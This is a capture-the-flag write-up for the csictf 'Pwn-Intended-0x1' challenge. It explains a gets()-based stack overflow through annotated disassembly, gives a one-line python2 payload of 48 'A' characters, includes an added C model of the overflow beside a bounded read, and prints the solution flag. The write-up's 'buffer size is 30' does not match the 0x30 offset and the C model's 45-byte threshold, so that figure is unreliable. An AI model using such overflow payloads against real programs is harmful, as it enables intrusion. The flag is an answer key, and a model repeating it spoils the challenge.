Pwn-Intended-0x1


WriteUp source

https://dunsp4rce.github.io/csictf-2020/pwn/2020/07/22/Pwn-Intended-0x1.html

by AnandSaminathan

Challenge description

Challenge topics

Solution approach

This is exactly the same as coffer-overflow-0 from redpwn-2020.

We have to overwrite a variable with any value other than zero.

mov    rax,QWORD PTR [rip+0x2ef4]        
mov esi,0x0
mov rdi,rax
call 0x401040 <setbuf@plt>
mov rax,QWORD PTR [rip+0x2ef0]
mov esi,0x0
mov rdi,rax
call 0x401040 <setbuf@plt>
mov rax,QWORD PTR [rip+0x2eec]
mov esi,0x0
mov rdi,rax
call 0x401040 <setbuf@plt>
lea rdi,[rip+0xe60]
call 0x401030 <puts@plt>
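lea rax,[rbp-0x30] # input buffer starts at rbp-0x30
mov rdi,rax
mov eax,0x0
call 0x401060 <gets@plt> # gets(buffer): no length limit
lea rdi,[rip+0xe5f]
call 0x401030 <puts@plt>
cmp DWORD PTR [rbp-0x4],0x0 # checked variable at rbp-0x4
je 0x4011ed <main+151> # skip the flag branch while it is still zero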
lea rdi,[rip+0xe59]
call 0x401030 <puts@plt>
lea rdi,[rip+0xe94]
mov eax,0x0
call 0x401050 <system@plt> # system("cat flag.txt")
mov eax,0x0

The buffer size is 30, so any input of size >= 48 (multiple of 16) should print the flag. This worked:

python2 -c "print 'A'*48" | ./pwn-intended-0x1
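
The stack layout from the disassembly (buffer at rbp-0x30, checked DWORD at rbp-0x4, 0x2c bytes apart), modelled in C next to a bounded read. This is an added example, not the challenge source or the write-up author's code; the struct, the function names and the 'A' test input are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of main's locals as seen in the disassembly: the input buffer
   starts at rbp-0x30 and the compared DWORD sits at rbp-0x4, so
   0x30 - 0x4 = 0x2c (44) bytes lie in front of it. Names are assumed. */
struct frame {
    char buf[0x2c];   /* rbp-0x30 .. rbp-0x5 */
    int  check;       /* rbp-0x4, compared with 0 before the flag branch */
};

/* gets()-like copy: stores every input byte plus a NUL, ignoring buf's
   size. Clamped to the struct so the model itself stays defined C. */
int read_unbounded(const char *input) {
    struct frame f = {0};
    size_t n = strlen(input) + 1;             /* gets also writes '\0' */
    if (n > sizeof f) n = sizeof f;
    memcpy((unsigned char *)&f, input, n);
    return f.check;
}

/* Bounded copy, the limit fgets(buf, sizeof buf, stdin) would enforce. */
int read_bounded(const char *input) {
    struct frame f = {0};
    size_t n = strlen(input);
    if (n > sizeof f.buf - 1) n = sizeof f.buf - 1;
    memcpy(f.buf, input, n);
    f.buf[n] = '\0';
    return f.check;
}

/* Feed len 'A' bytes (at most 63) to one reader and return check. */
int check_after(size_t len, int bounded) {
    char in[64];
    if (len > sizeof in - 1) len = sizeof in - 1;
    memset(in, 'A', len);
    in[len] = '\0';
    return bounded ? read_bounded(in) : read_unbounded(in);
}

int main(void) {
    for (size_t len = 43; len <= 48; len++)
        printf("len %zu: gets-like=%#x bounded=%#x\n", len,
               (unsigned)check_after(len, 0), (unsigned)check_after(len, 1));
    return 0;
}
```

With the gets-like copy, `check` stays zero up to 44 input bytes (the trailing NUL lands on its first byte) and becomes nonzero from 45 bytes on; the bounded copy leaves it zero at every length.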

Flag

csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}